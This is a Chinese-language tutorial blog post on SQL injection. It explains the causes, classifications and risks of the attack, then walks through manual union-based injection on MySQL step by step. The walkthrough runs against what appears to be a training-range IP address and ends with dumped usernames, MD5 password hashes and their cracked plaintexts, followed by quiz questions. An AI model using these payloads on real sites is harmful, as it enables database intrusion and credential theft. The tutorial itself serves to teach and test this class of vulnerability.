2. 程式人生 > 其它 >SQL注入之基礎知識及手工注入

SQL注入之基礎知識及手工注入

阿新 發佈:2021-11-03

前言
SQL注入是比較常見的網路攻擊方式之一,它不是利用作業系統的BUG來實現攻擊,而是針對程式設計師編寫時的疏忽,通過SQL語句,實現無賬號登入,甚至篡改資料庫。

SQL簡介

SQL 是一門 ANSI 的標準計算機語言,用來訪問和操作資料庫系統-。SQL 語句用於取回和更新資料庫中的資料。SQL 可與資料庫程式協同工作,比如 MS Access、DB2、Informix、MS SQL Server、Oracle、Sybase 以及其他資料庫系統。

SQL注入

SQL注入就是一種通過操作輸入來修改後臺SQL語句達到程式碼執行進行攻擊目的的技術。

SQL注入產生原理

  1. 對使用者輸入的引數沒有進行嚴格過濾(如過濾單雙引號 尖括號等),就被帶到資料庫執行,造成了SQL注入
  2. 使用了字串拼接的方式構造SQL語句

SQL注入的分類

從注入手法分類可以分為:聯合查詢注入、報錯型注入、布林型注入、延時注入、堆疊注入
從資料型別上可以分為:字元型(即輸入的輸入使用符號進行過濾)、數值型(即輸入的輸入未使用符號進行過濾)
從注入位置可以分類為:GET資料(提交資料方式為GET,大多存在位址列)、POST資料(提交資料方式為POST,大多存在輸入框中)、HTTP頭部(提交資料方式為HTTP頭部)、cookie資料(提交資料方式為cookie)

SQL注入的危害

分為兩類:危害資料庫裡的資料、直接危害到網站的許可權(需要滿足條件)

  1. 資料庫資訊洩露
  2. 網頁篡改:登陸後臺後釋出惡意內容
  3. 網站掛馬 : 當拿到webshell時或者獲取到伺服器的許可權以後,可將一些網頁木馬掛在伺服器上,去攻擊別人
  4. 私自新增系統賬號
  5. 讀寫檔案獲取webshell

MYSQL資料庫

資料庫A=網站A=資料庫使用者A
表名
列名
資料
資料庫B=網站B=資料庫使用者B
。。。。。。
資料庫C=網站C=資料庫使用者C
。。。。。。

必要知識

1.在MYSQL5.0以上版本中,MYSQL存在一個自帶資料庫名為information_schema,它是一個儲存記錄有所有資料庫名,表名,列名的資料庫,也相當於可以通過查詢它獲取指定資料庫下面的表名或者列名資訊。

2.資料庫中符號"."代表下一級,如xiaodi.user表示xiaodi資料庫下的user表名。

3.常用引數

  • information_schema.tables:記錄所有表名資訊的表
  • information_schema.columns:記錄所有列名資訊的表
  • table_name:表名
  • column_name:列名
  • table_schema:資料庫名
  • user() 檢視當前MySQL登入的使用者名稱
  • database() 檢視當前使用MySQL資料庫名
  • version() 檢視當前MySQL版本

如何判斷注入點

1.如果頁面中MySQL報錯,證明該頁面中存在SQL注入漏洞

單引號 '
and 1=1
and 1=2
SELECT * FROM users WHERE id=1 and 1=1 LIMIT 0,1 正常
SELECT * FROM users WHERE id=1 and 1=2 LIMIT 0,1 錯誤

2.邏輯運算子(或與非)

真 且 真 = 真
真 且 假 = 假
真 或 假 = 真
SELECT * FROM users WHERE id=1 真
1=1 真
1=2 假
真且真=真
真且假=假
SELECT * FROM users WHERE id=1 or 1=1 LIMIT 0,1 正常
SELECT * FROM users WHERE id=1 or 1=2 LIMIT 0,1 正常

SQL注入利用

1.利用order判斷欄位數

order by x(數字) 正常與錯誤的正常值  正確網頁正常顯示,錯誤網頁報錯
?id=1' order by 3--+

2.利用 union select 聯合查詢,將id值設定成不成立,即可探測到可利用的欄位數

?id=-1 union select 1,2,3 --+

3.利用函式database(),user(),version()可以得到所探測資料庫的資料庫名、使用者名稱和版本號

?id=-1 union select 1,database(),version() --+

4.利用 union select 聯合查詢,獲取表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='已知庫名'--+

5.利用 union select 聯合查詢,獲取欄位名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='已知表名'--+

6.利用 union select 聯合查詢,獲取欄位值

?id=-1' union select 1,2,group_concat(已知欄位名,':'已知欄位名) from 已知表名--+

測試演示

要選用最舒服的方法測試:

SELECT * FROM users WHERE id=1asdsadsad(隨便輸入) LIMIT 0,1

隨便輸入後對網頁有影響說明帶入資料庫進行查詢,有注入點,沒有影響說明沒有帶入資料庫查詢,出現404錯誤說明對輸入檢測,沒有漏洞

1.猜解列名數量(欄位數)

order by x(數字) 正常與錯誤的正常值 正確網頁正常顯示,錯誤網頁報錯

http://219.153.49.228:48965/new_list.php?id=1 order by 4

2.報錯猜解準備

http://219.153.49.228:48965/new_list.php?id=1 union select 1,2,3,4
http://219.153.49.228:48965/new_list.php?id=-1 union select 1,2,3,4
或者
http://219.153.49.228:48965/new_list.php?id=1 and 1=2 union select 1,2,3,4

3.資訊收集

資料庫版本:version() == 5.7.22-0ubuntu0.16.04.1==
資料庫名字:database() == mozhe_Discuz_StormGroup==
資料庫使用者:user() root@localhost
作業系統:@@version_compile_os Linux

http://219.153.49.228:48965/new_list.php?id=1 and 1=2 union select 1,version(),database(),4
http://219.153.49.228:48965/new_list.php?id=1 and 1=2 union select 1,user(),@@version_compile_os,4

4.查詢指定資料庫名 “mozhe_Discuz_StormGroup” 下的表名資訊:

  • 查詢一個
http://219.153.49.228:48965/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
  • 查詢所有
http://219.153.49.228:48965/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
  • 查詢到的表名
StormGroup_member, notice

5.查詢指定表名“StormGroup_member”下的列名資訊

http://219.153.49.228:48965/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查詢的結果

id,name,password,status

6.查詢指定資料

http://219.153.49.228:48965/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member

查詢結果

mozhe
356f589a7df439f6f744ff19bb8092c0  -md5解密-->  dsan13

7.猜解多個數據可以採用limit x,1變動猜解

http://219.153.49.228:48965/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 0,1
mozhe
356f589a7df439f6f744ff19bb8092c0  --md5解密--> dsan13

http://219.153.49.228:48965/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1
mozhe
2ae4c2ac594629684e67554fc5ad6ee1   --md5解密-->  147719

題目

  1. 可能存在注入的編號選項有哪幾個?

    www.xiaodi8.com/index.php?id=8
www.xiaodi8.com/?id=10
www.xiaodi8.com/?id=10&x=1
www.xiaodi8.com/index.php(post注入)

  2. 引數有x注入,以下哪個注入測試正確

    A.www.xiaodi8.com/new/php?y=1 and 1=1&x=2
B.www.xiaodi8.com/new/php?y=1&x=2 and 1=1
C.www.xiaodi8.com/new/php?y=1 and 1=1 & x=2 and 1=1
D.www.xiaodi8.com/new/php?xx=1 and 1=1&xxx=2 and 1=1

  3. 如果引數id存在注入點,引數的位置可以互換,使用工具的時候要注意

    http://www/cnhgs.net/main.php?id53(注入點) and 1=2 &page=1 
->   http://www/cnhgs.net/main.php?page=1&id53(注入點) and 1=2

相關推薦

SQL注入基礎知識手工注入

前言 SQL注入是比較常見的網路攻擊方式之一,它不是利用作業系統的BUG來實現攻擊,而是針對程式設計師編寫時的疏忽,通過SQL語句,實現無賬號登入,甚至篡改資料庫。

邏輯迴歸基礎知識手寫數字識別例項

作者:daniel-D 原文:http://www.cnblogs.com/daniel-D/   這學期 Pattern Recognition 課程的 project 之一是手寫數字識別,二是做一個網站驗證碼的識別(鴨梨不小哇)。麵包要一口一口吃,先嚐試把模式識別的

SQL注入基礎知識繞過方式

介紹 SQL注入即是指web應用程式對使用者輸入資料的合法性沒有判斷或過濾不嚴,攻擊者可以在web應用程式中事先定義好的查詢語句的結尾上新增額外的SQL語句,在管理員不知情的情況下實現非法操作,以此來實現欺騙資料庫

十六:SQL注入查詢方式報錯盲注

在很多注入時,有很多注入會出現無回顯的情況,其中不回顯的原因可能是SQL查詢語句有問題,這時候我們需要用到相關的報錯或者盲注進行後續操作,同時作為手工注入的時候,需要提前瞭解SQL語句能更好的選擇對應的注

sql注入查詢方式報錯注入

當進行sql注入時,有很多注入會出無回顯的情況,其中不回顯的原因可能是sql語句查詢方式的問題導致的,這個時候我們需要用到相關的報錯或盲注進行後續操作,同時作為手工注入時,提前瞭解或預知器sqkl語句大概寫法也

SQL注入查詢方式報錯盲注

前言 當進行SQL注入時,有很多注入會出現無回顯的情況,其中不回顯的原因可能是SQL語句查詢方式的問題導致,這個時候我們需要用到相關的報錯或盲注進行後續操作,同時作為手工注入時,提前瞭解或預知其SQL語句大概寫

SQL注入DVWA平臺測試mysql注入

今天主要針對mysql常用注入語句進行測試。測試環境與工具:測試平臺:DVWA,下載地址:http://down.51cto.com/data/875088,也可下載metaspolit-table2虛擬機器,裡面已經部署好了dvwa.。***工具:burpsui

初學SQL 注入常見的幾種注入型別

技術標籤:日常操作sql資訊保安安全web SQL注入原理 老生常談,SQL注入攻擊的本質就是把使用者輸入的引數當做SQL語句來執行,Web應用程式對使用者輸入資料的合法性沒有判斷和過濾,攻擊者可以通過構造不同的SQL

一文快速掌握華為雲IPv6基礎知識使用指南

隨著5G、物聯網等新興技術領域的發展,IP空間需求巨大,IPv6成為萬物互聯的基礎,勢在必行;華為雲作為IPv6成熟商用開拓者,針對金融、廣電、媒資等不同行業推出IPv6解決方案,助力企業平滑升級到IPv6基礎架構。本文

oracle基礎知識語法

ORACLE支援五種型別的完整性約束 NOT NULL (非空)--防止NULL值進入指定的列,在單列基礎上定義,預設情況下,ORACLE允許在任何列中有NULL值.

Docker基礎知識入門

什麼是Docker? Docker是由dotcloud公司使用golang語言進行開發的,基於Linux核心的 cgroup,namespace,以及OverlayFS類的Union FS等技術,對程序進行封裝隔離,屬於作業系統層面的虛擬化技術。由於隔離的程序獨立於

Elasticsearch 基礎介紹索引原理分析 【轉】

基本概念 Elasticsearch是面向文件型資料庫,一條資料就是一個文件,用JSO作為文件序列化的格式,比如下面的使用者資料。

Python基礎知識

技術標籤:Pythonpython Python 是一種快速工作和系統整合的程式語言。 檢視Python版本資訊

python學習——DAY1 一些基礎知識簡單題

技術標籤:Pythonxiaobaipython -------------===----------DAY1-----------===---------------- 主要是python的一些基礎

TypeScript列舉的基礎知識例項

目錄前言TypeScript 中的列舉是什麼在 TypeScript 中使用列舉需要注意什麼常見列舉的型別列舉反向對映計算列舉總結前言

MySQL資料庫基礎知識操作

MySQL資料庫基礎知識操作 MySQL伺服器邏輯架構圖 問:innodb引擎執行一條select語句的過程?

加密與解密基礎知識

一、什麼是加密解密 軟體逆向工程(Reverse Engineering):        是指根據已有的產物和結果,通過分析來推匯出具體的實現方法。

Bitmap那些事基礎知識

前言:本來我是做電視應用的,但是因為公司要出手機,人員緊張,所以就抽調我去支援一下,誰叫俺是雷鋒呢!

sql注入基礎知識

技術標籤:sql sql注入一:【關鍵看語法怎麼拼接進去】 &XDEBUG_SESSION_START=PHPSTORM 除錯 id = ‘1’ or 1=1 –>恆等於 id = 1 or 1=1 –>恆等於 開啟監聽Debug 解釋 Variables 方便跟進

SQL注入數字型注入(手工)(1)

產生注入漏洞條件 引數使用者可控:前端傳給後端的引數內容是可以被使用者控制的